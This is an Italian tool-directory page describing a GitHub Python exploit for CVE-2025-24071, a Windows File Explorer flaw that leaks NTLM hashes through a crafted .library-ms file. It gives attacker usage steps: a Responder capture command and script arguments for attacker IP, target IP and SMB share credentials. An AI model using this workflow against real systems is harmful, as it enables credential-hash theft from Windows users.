Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-24071 — Script Python per eseguire CVE-2025-24071 | Kitploit
Strumenti/GitHubGitHub/ac8999/cve-2025-24071
Password CrackingAnalisi delle VulnerabilitàExploitRaccolta InformazioniPenetration TestingRed Teaming
GitHubac8999/cve-2025-24071

CVE-2025-24071

Script Python per eseguire CVE-2025-24071

Vedi Repository
111 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-24071: Vulnerabilità di Spoofing di Esplora File di Microsoft Windows (script di SilentExploit)

📖 Descrizione

Questo progetto rileva e dimostra lo sfruttamento di una vulnerabilità di spoofing di Esplora File di Windows.

Il problema deriva da un file di libreria di Windows (.library-ms) contenente un percorso di rete, sia come allegato diretto sia incorporato in un archivio.
Quando aperto, il file può indurre Windows a divulgare hash NTLM a una posizione di rete remota (potenzialmente dannosa).

POC: https://imgur.com/a/hEO83Se

⚡ Utilizzo

1. Avvia Responder

Sulla tua macchina attaccante, esegui Responder per catturare gli hash NTLM:

root@kitploit:~
sudo responder -I tun0 -wvF

2. Esegui lo script

Puoi configurare lo script in due modi:

✅ Opzione A: Modifica i valori predefiniti (più semplice)

Modifica i parametri predefiniti direttamente nello script.

root@kitploit:~
    parser.add_argument("--attacker-ip", default="10.10.14.14", help="IP dell'attaccante")      #il tuo IP
    parser.add_argument("--target-ip", default="10.129.232.88", help="IP del bersaglio")         #IP del bersaglio
    parser.add_argument("--share-name", default="IT", help="Nome della condivisione SMB")               #nome della condivisione a cui hai accesso senza /
    parser.add_argument("--username", default="USERNAME", help="Nome utente SMB")          #nome utente del proprietario della condivisione
    parser.add_argument("--password", default="PASSWORD", help="Password SMB")        #password del proprietario della condivisione
    parser.add_argument("--interface", default="tun0", help="Interfaccia di rete di Responder")        #controlla ifconfig; tun0 funzionerà se sei su una VPN
    return parser.parse_args()

✅ Opzione B: Esegui con parametri da riga di comando

Esegui con argomenti:

root@kitploit:~
python3 CVE-2025-24071.py \
    --attacker-ip <IP_ATTACCANTE> \
    --target-ip <IP_BERSAGLIO> \
    --share-name <NOME_CONDIVISIONE> \
    --username <NOME_UTENTE> \
    --password <PASSWORD> \
    --interface <INTERFACCIA>
Scarica lo strumento